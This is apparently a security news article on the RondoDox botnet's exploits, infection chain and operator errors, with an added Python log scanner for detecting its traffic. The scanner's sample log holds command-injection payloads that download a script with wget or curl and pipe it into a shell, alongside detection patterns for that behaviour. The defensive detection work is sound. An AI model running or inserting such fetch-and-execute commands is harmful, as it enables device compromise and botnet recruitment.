
This expansion, combined with over 900 million exposed internet services, has created a massive attack surface.
In this vulnerable landscape, a powerful threat known as the RondoDox botnet has emerged, attracting attention for its massive arsenal of exploits and complex infrastructure.
First observed in May 2025, RondoDox generated significant traffic across global honeypots. While the malware shares code similarities with the Mirai botnet, RondoDox is distinct.
Unlike Mirai, which scans for and exploits other systems directly from infected hosts, RondoDox leaves exploitation to its operators' infrastructure; the bots themselves exist solely to launch distributed denial-of-service (DDoS) attacks.
The threat actors have demonstrated an aggressive approach, utilizing 174 different exploits and peaking at 15,000 daily exploitation attempts.
Infrastructure and Infection Chain
The infection process begins when the RondoDox infrastructure scans the internet for devices vulnerable to remote code execution (RCE).
Upon finding a target, attackers deploy a payload that fetches and executes a shell script entirely in memory, avoiding writing the initial implant to disk.
This script removes competing malware, locates a writable directory, and downloads the appropriate binary. Currently, RondoDox supports 18 hardware architectures, including ARM, MIPS, and x86 variants.
Exploit Arsenal and Threat Evolution
RondoDox operators initially employed a “shotgun approach,” blindly firing multiple exploits at a single target. Researchers observed the botnet utilizing 174 distinct vulnerabilities between May 2025 and February 2026.
However, nearly half of these exploits were discarded after a single day of use, indicating that threat actors continually test the success rate of their attacks before moving on.
By early 2026, the botnet’s methodology shifted. Instead of relying on dozens of older vulnerabilities, attackers streamlined operations to focus on just two highly effective exploits.
One was the React2Shell vulnerability (CVE-2025-55182), which operators added just three days after public disclosure.
In other instances, RondoDox exploited flaws before official CVE numbers were even published, indicating that the operators actively monitor security research and proof-of-concept releases.
Despite their speed, the threat actors occasionally struggled with implementation.
Early attacks featured incorrectly formatted JSON payloads, and some modern exploits failed because operators hardcoded incorrect User-Agent strings that triggered target defense mechanisms.
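As an added example (not code from the article, nor from the RondoDox operators or the researchers who analyzed them), the following Python scanner flags the fetch-and-execute-in-memory pattern described in the infection chain above (a downloader piped straight into a shell, and a `cd /a || cd /b` walk looking for a writable directory) together with the two operator mistakes noted here: request bodies declared as JSON that do not parse, and hardcoded tool-style User-Agent strings. The log records, regexes and tag names are constructed assumptions; the writable-directory idiom is a generic Mirai-family heuristic, not a signature taken from RondoDox.

```python
import json
import re

# Constructed sample access log (one JSON record per line). Not real RondoDox
# traffic: addresses are documentation ranges and payloads are illustrative.
SAMPLE_LOG = """\
{"src":"203.0.113.10","method":"GET","uri":"/","ua":"Mozilla/5.0 (X11; Linux x86_64)","ctype":"","body":""}
{"src":"198.51.100.7","method":"POST","uri":"/cgi-bin/admin.cgi","ua":"Mozilla/5.0","ctype":"application/x-www-form-urlencoded","body":"cmd=;cd /tmp || cd /var/run || cd /dev/shm; wget -O - http://198.51.100.7/x.sh | sh"}
{"src":"198.51.100.7","method":"POST","uri":"/api/login","ua":"Mozilla/5.0","ctype":"application/json","body":"{\\"user\\":\\"admin\\",\\"pass\\":}"}
{"src":"192.0.2.44","method":"POST","uri":"/setup.cgi","ua":"python-requests/2.31","ctype":"application/json","body":"{\\"cmd\\":\\"$(curl -fsSL http://192.0.2.44/bins.sh | bash)\\"}"}
{"src":"192.0.2.9","method":"POST","uri":"/api/login","ua":"Mozilla/5.0","ctype":"application/json","body":"{\\"user\\":\\"admin\\",\\"pass\\":\\"x\\"}"}
"""

# Downloader output piped into a shell: the stage-1 script never touches disk.
FETCH_EXEC = re.compile(
    r"\b(?:curl|wget|tftp|ftpget)\b[^|;&\n]*\|\s*(?:ba|a|da)?sh\b", re.I)

# "cd /tmp || cd /var/run || ..." hunting for a writable directory (assumed
# Mirai-style idiom; the article only says the script locates such a directory).
WRITABLE_PROBE = re.compile(r"cd\s+/\S+\s*\|\|\s*cd\s+/\S+")

# Hardcoded HTTP-library User-Agents that a WAF or device firmware commonly
# rejects outright (assumed heuristic; the real offending strings are unknown).
TOOL_UA = re.compile(
    r"^(?:curl/|wget/|python-requests|python-urllib|go-http-client|libwww-perl)", re.I)


def classify(rec: dict) -> list[str]:
    """Return the indicator tags that fire on one decoded request record."""
    tags = []
    haystack = f"{rec.get('uri', '')} {rec.get('body', '')}"
    if FETCH_EXEC.search(haystack):
        tags.append("fetch_exec")
    if WRITABLE_PROBE.search(haystack):
        tags.append("writable_dir_probe")
    # A body announced as JSON that does not parse is the sloppy-operator
    # signal: a hand-built exploit template that was never validated.
    body = rec.get("body", "")
    if rec.get("ctype", "").lower().startswith("application/json") and body:
        try:
            json.loads(body)
        except ValueError:
            tags.append("malformed_json")
    if TOOL_UA.match(rec.get("ua", "")):
        tags.append("tool_user_agent")
    return tags


def scan(log_text: str) -> dict[str, list[str]]:
    """Aggregate tags per source IP; sources with no hits are omitted."""
    hits: dict[str, set[str]] = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        tags = classify(rec)
        if tags:
            hits.setdefault(rec["src"], set()).update(tags)
    return {src: sorted(t) for src, t in hits.items()}


if __name__ == "__main__":
    for src, tags in scan(SAMPLE_LOG).items():
        print(f"{src}: {', '.join(tags)}")
```

A source that trips `fetch_exec` is worth blocking on its own; `malformed_json` and `tool_user_agent` are weak signals individually, but a source that combines them with an exploit attempt in the same session is the profile this article describes.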
Recent industry rumors suggesting RondoDox uses a “Loader-as-a-Service” backend or a decentralized peer-to-peer (P2P) network have been debunked by Bitsight's analysis.
The supposed backend panel was merely an open text file logging basic POST requests, and the alleged P2P nodes were simply the compromised residential IPs hosting the malware payloads.
As RondoDox refines its tactics and rapidly adopts new vulnerabilities, organizations must prioritize strict exposure management and rapid patching of internet-facing systems to prevent devastating botnet infections.
The post RondoDox Botnet Grows To 174 Exploits With Large-Scale Residential IP Abuse appeared first on Cyber Security News.
